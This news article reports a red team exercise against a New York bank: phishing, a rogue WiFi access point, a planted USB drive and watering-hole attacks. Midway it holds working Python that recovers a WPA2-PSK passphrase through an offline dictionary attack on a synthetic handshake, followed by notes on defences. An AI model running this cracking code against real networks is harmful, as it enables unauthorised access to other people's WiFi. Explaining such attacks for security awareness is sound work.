Red Teaming in the real world

Red teaming is a relatively new form of extended penetration testing, used to raise the security and governance bar in large corporates, most notably financial services organisations such as banks.

The vast majority of financial services organisations do not reveal the results of their red team exercises because of the political sensitivity involved, so SCMagazineUK.com was keen to hear what Dan Soloman, head of cyber risk and security services with Optimal Risk Management, had to say about a red team exercise he and his staff recently carried out against a major New York bank.

In a presentation at Counter Terror Expo this week, Soloman explained that the main objective of a red team exercise is to stage a series of controlled attacks against the organisation concerned, expose the failures in all aspects of its physical and electronic security, and prepare the business for a real-world cyber attack.

"In the New York bank exercise, we looked at several areas, including how APTs work in the real world, the human attack issue and, of course, pen testing. We test-attacked all of the bank's Web, client and mobile applications," he said.

On the human-attack front, Soloman and his team staged spear-phishing attacks, as well as APT-style intrusions with custom malware, DDoS attacks and mobile device application tests.

War gaming

Next came the war-gaming phase, which involves physical infiltration as well as Web access, WiFi network analysis and interrogation.

A USB drive was planted in the bank's comms room, and the team gained access to the business's WiFi antenna, a step that could be 'game over' for many organisations, especially since the team also successfully cloned the bank's WiFi network and got staff to log into the rogue access point.

"It was interesting that the bank had a silent alarm on its IT facilities, but we bypassed this, as our red team was in - and out - in under three minutes," he said, adding that before leaving, the team had planted a series of bugs and was able to monitor staff Skype conversations.

Soloman also made the interesting claim that his team were able to crack the bank's WiFi password, on a network protected with WPA2, in about four-and-a-half hours, a process they repeated at a second bank site, proving the methodology. The article does not describe the method used, but the usual route against WPA2-PSK is to capture a client's four-way handshake and run an offline dictionary attack against it, so the time taken reflects the strength of the pre-shared key rather than a weakness in WPA2 itself.
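The following Python is an added illustration of that offline attack; it is not the Optimal Risk team's tooling and nothing in it comes from the bank exercise. It builds a synthetic EAPOL-Key message 2 (constructed data, not a real capture) for a known passphrase, then recovers that passphrase from a wordlist by recomputing, for each candidate, the PMK (PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID), the key confirmation key from the 802.11 PRF, and the frame MIC. The SSID, MAC addresses, nonces and wordlist are all assumed values chosen for the demonstration.

```python
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81   # byte offset of the MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output.
    Those 4096 rounds are the only cost slowing an offline guess down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK (the key confirmation key), via the 802.11 PRF-512.
    MACs and nonces are ordered min/max so both parties derive the same key."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    ptk = b"".join(
        hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Key descriptor version 2 (AES-CCMP networks): MIC = HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:MIC_LEN]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Assemble a minimal EAPOL-Key message 2 (constructed, not a real capture).
    Layout: 802.1X hdr(4) | desc type(1) | key info(2) | key len(2) | replay ctr(8)
            | nonce(32) | IV(16) | RSC(8) | ID(8) | MIC(16) | key data len(2) | key data"""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN IE
    body = (b"\x02"                 # descriptor type: RSN key
            + b"\x01\x0a"           # key info: version 2, pairwise, MIC present
            + b"\x00\x10"           # key length 16
            + b"\x00" * 8           # replay counter
            + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + mic
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def make_synthetic_handshake(passphrase: str, ssid: str = "BranchWiFi") -> dict:
    """Constructed stand-in for a captured handshake (assumed SSID, MACs and nonces)."""
    ap_mac = bytes.fromhex("021122334455")
    sta_mac = bytes.fromhex("02aabbccddee")
    anonce = hashlib.sha256(b"assumed ANonce").digest()
    snonce = hashlib.sha256(b"assumed SNonce").digest()
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(kck, build_eapol_msg2(snonce))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": build_eapol_msg2(snonce, mic)}


def crack_psk(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: zero the MIC field, recompute it per candidate, compare."""
    frame = bytearray(hs["eapol"])
    captured_mic = bytes(frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])
    frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN] = b"\x00" * MIC_LEN
    zeroed = bytes(frame)
    for candidate in wordlist:
        kck = derive_kck(pmk_from_passphrase(candidate, hs["ssid"]),
                         hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    hs = make_synthetic_handshake("correct horse battery")      # assumed "real" PSK
    wordlist = ["password", "Welcome1", "correct horse battery", "letmein"]  # constructed
    print("recovered:", crack_psk(hs, wordlist))
```

Every candidate costs 4096 HMAC-SHA1 iterations, which is trivial for a GPU cracker; several hours of run time therefore buys hundreds of millions of guesses, enough for most human-chosen passphrases but not for a long random one. The practical defences are a long random PSK, or moving to WPA2-Enterprise so that no shared passphrase exists to be captured and cracked.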

"This also allowed us to carry out a watering-hole attack using a fake Web page," he said, adding that the process of inserting malware via the fake Web site is a relatively easy step to take.

Another avenue that successfully compromised staff email accounts was sending personalised emails to staff, offering them a reward in return for referrals to colleagues.

LinkedIn, he says, was also useful in this regard, as it allows the red team to gather information on staff before sending personalised messages offering a US$50 (£30) reward for referring friends on LinkedIn.